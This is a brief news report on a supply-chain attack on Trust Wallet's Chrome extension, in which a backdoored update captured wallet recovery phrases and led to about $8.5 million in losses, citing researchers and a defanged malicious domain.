Approximately $8.5 million in assets were stolen due to a cyber attack targeting Trust Wallet's Google Chrome extension. The company disclosed on Tuesday that this breach, linked to the second iteration of the Shai-Hulud supply chain outbreak in November 2025, allowed attackers to gain access to their internal systems.
By exploiting exposed developer secrets, the attacker secured full access to the Chrome Web Store API. This unauthorized access facilitated the upload of a compromised extension that included a backdoor designed to capture users' wallet mnemonic phrases. According to cybersecurity firm Koi, this malicious code activates during every unlock attempt, compromising sensitive information regardless of user authentication methods.
Researchers highlighted that all wallets associated with a user's account were at risk, not just the currently active one. The rogue domain "metrics-trustwallet[.]com" was linked to a hosting provider known for supporting various cybercriminal activities. The domain's response further included a reference to the Dune universe, reflecting previous incidents related to the Shai-Hulud outbreak.